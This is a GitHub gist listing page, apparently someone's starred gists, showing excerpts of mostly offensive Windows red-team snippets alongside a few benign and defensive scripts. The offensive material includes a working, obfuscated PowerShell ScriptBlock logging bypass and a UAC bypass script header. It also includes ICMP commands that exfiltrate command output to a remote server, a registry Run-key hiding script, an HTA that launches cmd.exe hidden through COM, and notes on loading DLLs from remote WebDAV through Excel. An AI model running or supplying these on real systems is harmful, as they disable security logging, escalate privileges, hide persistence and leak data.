Skip to content

Instantly share code, notes, and snippets.

View natesubra's full-sized avatar

Nate Subra natesubra

58 followers · 206 following
View GitHub Profile
@CMCDragonkai
CMCDragonkai / stay-awake.ps1
Last active May 13, 2025 12:31
Keep Windows Awake Temporarily (Prevent Sleep, Display Off or Away Mode) #cli #powershell #windows
#!/usr/bin/env powershell
# This script can keep the computer awake while executing another executable, or
# if no executable was passed in, then it stays awake until this script stops.
# There are 3 different ways of staying awake:
# Away Mode - Enable away mode (https://blogs.msdn.microsoft.com/david_fleischman/2005/10/21/what-does-away-mode-do-anyway/)
# Display Mode - Keep the display on and don't go to sleep or hibernation
# System Mode - Don't go to sleep or hibernation
# The default mode is the System Mode.
# Away mode is only available when away mode is enabled in the advanced power options.
@ozlerhakan
ozlerhakan / secure-docker-daemon.sh
Last active August 10, 2021 08:37
#!/bin/bash
#
# Docker Daemon varsayilan olarak ag iletisimi olmadan
# sadece Unix socket uzerinden calismaktadir.
# Docker Client ve Daemon arasinda HTTPS uzerinden
# guvenli iletisimin kurulmasi icin TLS aktif hale getirilmelidir.
# Client ve Server/daemon arasindaki guvenli iletisim agi
# icin gereken client ve server sertifikasyonlarini
# olusturmaliyiz.
#
@ryhanson
ryhanson / ExcelXLL.md
Last active November 8, 2024 14:51
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

@jaredcatkinson
jaredcatkinson / Get-InjectedThread.ps1
Last active May 26, 2025 12:25
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
@cobbr
cobbr / ScriptBlockLogBypass.ps1
Last active May 22, 2025 11:30
ScriptBlock Logging Bypass
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
@tyranid
tyranid / bypass_uac.ps1
Last active July 11, 2024 12:27
# Powershell script to bypass UAC on Vista+ assuming
# there exists one elevated process on the same desktop.
# Technical details in:
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html
# You need to Install-Module NtObjectManager for this to run.
Import-Module NtObjectManager
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active June 3, 2025 14:01
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@jobertabma
jobertabma / icmp.md
Last active September 14, 2022 15:02
Commands to exfiltrate command output via ICMP packet size
  1. Capture ICMP packets on your server:
tcpdump -nni eth0 -e icmp[icmptype] == 8 -w output.cap
  1. Send ICMP packets to your server with each byte stored in the packet size, execute this on the remote machine:
ip=vm03;output=`hostname`;for ((i=0;i&lt;${#output};i++));do; ping -c 1 -s `printf '%d\n' "'${output:$i:1}'"` $ip;done
@brianreitz
brianreitz / PSReflect-RegHide.ps1
Created July 14, 2017 12:30
PowerShell script to hide a Run key like Reghide/Kovter/Poweliks
# requires PSReflect.ps1 to be in the same directory as this script
. .\PSReflect.ps1
$Module = New-InMemoryModule -ModuleName RegHide
# Define our structs.
# https://msdn.microsoft.com/en-us/library/windows/hardware/ff564879(v=vs.85).aspx
# typedef struct _UNICODE_STRING {
# USHORT Length;
# USHORT MaximumLength;
@enigma0x3
enigma0x3 / COM.hta
Last active June 9, 2022 02:24
<script language="VBScript">
Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
obj.Document.Application.ShellExecute "cmd.exe",Null,"C:\Windows\System32",Null,0
self.close
</script>